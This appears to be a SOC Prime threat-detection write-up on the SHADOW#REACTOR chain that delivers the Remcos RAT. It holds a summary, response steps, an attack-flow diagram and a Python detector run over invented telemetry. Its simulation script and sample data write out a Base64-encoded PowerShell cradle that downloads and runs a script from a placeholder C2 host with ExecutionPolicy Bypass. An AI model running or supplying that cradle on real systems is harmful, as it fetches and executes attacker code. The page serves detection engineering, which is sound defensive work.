SOC Prime Bias: Medium

15 Jan 2026 18:51

SHADOW#REACTOR – TEXT-ONLY STAGING, .NET REACTOR, AND IN-MEMORY REMCOS RAT DEPLOYMENT

Ruslan Mikhalov, Chief of Threat Research at SOC Prime

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

SHADOW#REACTOR is a multi-stage Windows malware chain that combines an obfuscated VBS launcher, a PowerShell-based downloader, text-only staging artifacts, a .NET Reactor–protected loader, and MSBuild execution to ultimately deploy the Remcos remote access trojan (RAT).

Investigation

Researchers reconstructed the flow starting with a VBS script retrieved from attacker infrastructure, followed by PowerShell routines that reassemble and decode staged text payloads. The chain proceeds with reflective, in-memory loading of a .NET assembly and a final handoff to MSBuild, which triggers execution of the Remcos RAT. The write-up documents the text-encoded components, decryption logic, and persistence methods used to maintain access.

Mitigation

Increase monitoring coverage for script hosts and interpreters, and prevent VBS/PowerShell execution from user-writable paths where feasible. Add detections for suspicious outbound HTTP traffic to identified infrastructure, MSBuild misuse, and reflective .NET assembly loading. Monitor for common persistence patterns, including Run-key modifications and shortcut-based startup entries.

Response

If SHADOW#REACTOR activity is confirmed, isolate the endpoint and kill the full process chain (wscript.exe → powershell.exe → msbuild.exe). Remove any staged text files and related registry artifacts, and remediate by deleting Remcos binaries and associated configuration blobs. Follow with a thorough forensic review to scope additional compromise and ensure complete eradication.

Attack Flow

    graph TB
        %% Class Definitions Section
        classDef technique fill:#ffe699
        classDef builtin fill:#cccccc
        classDef malware fill:#ff9999
        %% Node definitions
        tech_user_execution["<b>Technique</b> – <b>T1204.002 User Execution: Malicious File</b><br/><b>Description</b>: Victim runs a malicious file that launches code."]
        class tech_user_execution technique
        tool_wscript["<b>Tool</b> – <b>Name</b>: wscript.exe<br/><b>Description</b>: Windows Script Host used to execute VBScript files."]
        class tool_wscript builtin
        tech_vbscript_interp["<b>Technique</b> – <b>T1059.005 Command and Scripting Interpreter: Visual Basic</b><br/><b>Description</b>: Executes Visual Basic scripts on the host system."]
        class tech_vbscript_interp technique
        tech_powershell_interp["<b>Technique</b> – <b>T1059.001 Command and Scripting Interpreter: PowerShell</b><br/><b>Description</b>: Runs PowerShell commands and scripts."]
        class tech_powershell_interp technique
        tech_http_comm["<b>Technique</b> – <b>T1071.001 Application Layer Protocol: Web Protocols</b><br/><b>Description</b>: Uses HTTP/HTTPS to download payload fragments from remote servers."]
        class tech_http_comm technique
        tech_obfuscation["<b>Technique</b> – <b>T1027 Obfuscated Files or Information</b><br/><b>Description</b>: Payload is encoded with Base64, XOR and protected by .NET Reactor."]
        class tech_obfuscation technique
        tech_reflective_loading["<b>Technique</b> – <b>T1620 Reflective Code Loading</b> / <b>T1574.014 Hijack Execution Flow: AppDomainManager</b><br/><b>Description</b>: Loads a .NET assembly in memory via AppDomainManager hijacking."]
        class tech_reflective_loading technique
        tool_msbuild["<b>Tool</b> – <b>Name</b>: MSBuild.exe<br/><b>Description</b>: Trusted developer utility abused as a LOLBin to launch the final stage."]
        class tool_msbuild builtin
        malware_remcos["<b>Malware</b> – <b>Name</b>: Remcos RAT<br/><b>Description</b>: Remote access trojan used for command and control."]
        class malware_remcos malware
        tech_shortcut_mod["<b>Technique</b> – <b>T1547.009 Shortcut Modification</b><br/><b>Description</b>: Creates a LNK shortcut in the Startup folder to achieve persistence."]
        class tech_shortcut_mod technique
        %% Connections showing attack flow
        tech_user_execution -->|executes via| tool_wscript
        tool_wscript -->|runs| tech_vbscript_interp
        tech_vbscript_interp -->|invokes| tech_powershell_interp
        tech_powershell_interp -->|downloads fragments via| tech_http_comm
        tech_http_comm -->|reconstructs payload| tech_obfuscation
        tech_obfuscation -->|loads in memory via| tech_reflective_loading
        tech_reflective_loading -->|uses| tool_msbuild
        tool_msbuild -->|launches| malware_remcos
        malware_remcos -->|may create| tech_shortcut_mod

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    An attacker with limited lateral movement rights wishes to execute a remote payload on a compromised Windows host while evading typical script-blocking defenses. They use PowerShell with -ExecutionPolicy Bypass to ignore execution policy restrictions. The malicious payload is obfuscated as a Base64-encoded string that, when decoded, creates a System.Net.WebClient object to download a PowerShell script from a C2 server and invoke it. This combination satisfies all three detection criteria (ExecutionPolicy Bypass, FromBase64String, System.Net.WebClient).

  • Regression Test Script:

    #--------------------------------------------
    # Simulated malicious PowerShell execution
    #--------------------------------------------
    # 1. Craft a simple remote script (for demo only; {C2_HOST} is a placeholder)
    $remoteScript = 'Invoke-Expression (New-Object System.Net.WebClient).DownloadString("http://{C2_HOST}/payload.ps1")'
    # 2. Encode the script in Base64 (UTF-16LE, matching PowerShell's Unicode encoding)
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($remoteScript)
    $b64   = [Convert]::ToBase64String($bytes)
    # 3. Execute with ExecutionPolicy Bypass and FromBase64String.
    #    $b64 is expanded by the outer shell on purpose; $decoded is backtick-escaped
    #    so it reaches the child PowerShell as a literal variable name instead of
    #    being expanded (to an empty string) by the outer shell.
    PowerShell -ExecutionPolicy Bypass -Command "
        `$decoded = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('$b64'));
        Invoke-Expression `$decoded
    "
  • Cleanup Commands:

    # Stop any lingering PowerShell processes launched with ExecutionPolicy Bypass.
    # Win32_Process exposes the real command line; the StartInfo of a Get-Process
    # object does not carry the arguments of a process it did not start, so matching
    # on StartInfo.Arguments finds nothing.
    Get-CimInstance Win32_Process -Filter "Name = 'powershell.exe'" |
        Where-Object { $_.CommandLine -match 'ExecutionPolicy Bypass' } |
        ForEach-Object { Stop-Process -Id $_.ProcessId -Force }
    # Remove any payload the simulated script may have written to disk
    Remove-Item -Path "C:\Temp\payload.ps1" -ErrorAction SilentlyContinue
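The Mitigation section names the telemetry to watch (the wscript.exe → powershell.exe → msbuild.exe chain, MSBuild misuse, Run-key and Startup-shortcut persistence) and the attack narrative names the three criteria the detection rule keys on (ExecutionPolicy Bypass, FromBase64String, System.Net.WebClient). The following Python is an added example, not SOC Prime's rule or any code from the report, that runs those checks over constructed Sysmon-style events. Every host, path, PID and the Base64 blob are invented placeholders; the event field names are a simplification of Sysmon Event ID 1, 13 and 11. It goes one step beyond the narrative: because the WebClient call in the simulation lives inside the Base64 blob rather than on the command line, the checker decodes embedded Base64 literals before matching.

```python
"""Detection checks for a SHADOW#REACTOR-style chain, run over constructed telemetry."""
import base64
import re
from pathlib import PureWindowsPath

# --- Constructed sample telemetry (invented for this example, not from the report) ---
# Shapes follow Sysmon Event ID 1 (process create), 13 (registry value set) and
# 11 (file create). The host c2.invalid, the paths and the PIDs are placeholders.
REMOTE_SCRIPT = ('Invoke-Expression (New-Object System.Net.WebClient)'
                 '.DownloadString("http://c2.invalid/payload.ps1")')
B64_BLOB = base64.b64encode(REMOTE_SCRIPT.encode("utf-16-le")).decode()
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

PROCESS_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\Users\victim\AppData\Local\Temp\invoice.vbs"'},
    {"pid": 300, "ppid": 200, "image": PS_IMAGE,
     "cmd": "powershell.exe -ExecutionPolicy Bypass -Command \"$d=[Text.Encoding]::Unicode"
            f".GetString([Convert]::FromBase64String('{B64_BLOB}')); Invoke-Expression $d\""},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmd": r"MSBuild.exe C:\Users\victim\AppData\Roaming\stage.proj"},
    {"pid": 500, "ppid": 100, "image": PS_IMAGE,  # routine admin use: must not alert
     "cmd": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},
]
REGISTRY_EVENTS = [
    {"pid": 400, "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"C:\Users\victim\AppData\Roaming\stage.proj"},
]
FILE_EVENTS = [
    {"pid": 400, "target": r"C:\Users\victim\AppData\Roaming\Microsoft\Windows"
                           r"\Start Menu\Programs\Startup\updater.lnk"},
]

# The three criteria from the attack narrative, plus the -ep short form of the switch.
CRITERIA = {
    "ExecutionPolicy Bypass": re.compile(r"-(?:ExecutionPolicy|ep)\s+Bypass", re.I),
    "FromBase64String": re.compile(r"FromBase64String", re.I),
    "System.Net.WebClient": re.compile(r"System\.Net\.WebClient", re.I),
}
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\", re.I)
STARTUP_LNK = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.I)
SCRIPT_CHAIN = ("wscript.exe", "powershell.exe", "msbuild.exe")


def decode_embedded_base64(text):
    """Decoded text of every Base64-looking run in `text`: UTF-16LE is tried first
    (what PowerShell's Unicode encoding yields), then UTF-8; junk runs are skipped."""
    found = []
    for m in B64_RUN.finditer(text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:  # binascii.Error is a ValueError
            continue
        for enc in ("utf-16-le", "utf-8"):
            try:
                s = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if s.isprintable():
                found.append(s)
                break
    return found


def score_powershell_cmdline(cmd):
    """Set of criteria satisfied by a command line, including content hidden in Base64."""
    haystack = "\n".join([cmd, *decode_embedded_base64(cmd)])
    return {name for name, rx in CRITERIA.items() if rx.search(haystack)}


def ancestry(events, pid):
    """Lower-cased image basenames from `pid` up to the root: [self, parent, ...]."""
    by_pid = {e["pid"]: e for e in events}
    names, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        names.append(PureWindowsPath(by_pid[pid]["image"]).name.lower())
        pid = by_pid[pid]["ppid"]
    return names


def find_script_host_chains(events):
    """(pid, chain) for every msbuild.exe with powershell.exe and wscript.exe above it."""
    hits = []
    for e in events:
        names = ancestry(events, e["pid"])
        want = list(reversed(SCRIPT_CHAIN))  # msbuild, powershell, wscript
        i = 0
        for n in names:  # ordered subsequence match walking up the tree
            if i < len(want) and n == want[i]:
                i += 1
        if names and names[0] == want[0] and i == len(want):
            hits.append((e["pid"], " -> ".join(reversed(names))))
    return hits


def find_persistence(registry_events, file_events):
    """Run-key value sets and Startup-folder .lnk creations (T1547.009 per the report)."""
    hits = [("Run-key value", r["pid"], r["target"]) for r in registry_events if RUN_KEY.search(r["target"])]
    hits += [("Startup .lnk", f["pid"], f["target"]) for f in file_events if STARTUP_LNK.search(f["target"])]
    return hits


def run_detections(process_events, registry_events, file_events):
    alerts = []
    for e in process_events:
        if PureWindowsPath(e["image"]).name.lower() == "powershell.exe":
            matched = score_powershell_cmdline(e["cmd"])
            if matched == set(CRITERIA):  # all three criteria, as the rule requires
                alerts.append({"rule": "suspicious-powershell-download", "pid": e["pid"],
                               "criteria": sorted(matched)})
    for pid, chain in find_script_host_chains(process_events):
        alerts.append({"rule": "wscript-powershell-msbuild-chain", "pid": pid, "chain": chain})
    for kind, pid, target in find_persistence(registry_events, file_events):
        alerts.append({"rule": "persistence", "pid": pid, "kind": kind, "target": target})
    return alerts


if __name__ == "__main__":
    for a in run_detections(PROCESS_EVENTS, REGISTRY_EVENTS, FILE_EVENTS):
        print(a)
```

In production the same criteria should also be run over PowerShell script block text (Event ID 4104), since once the encoded blob has been decoded on the endpoint the WebClient call appears there in the clear even when command-line logging is truncated; the in-line Base64 decoding above only covers blobs short enough to survive in the process-creation record.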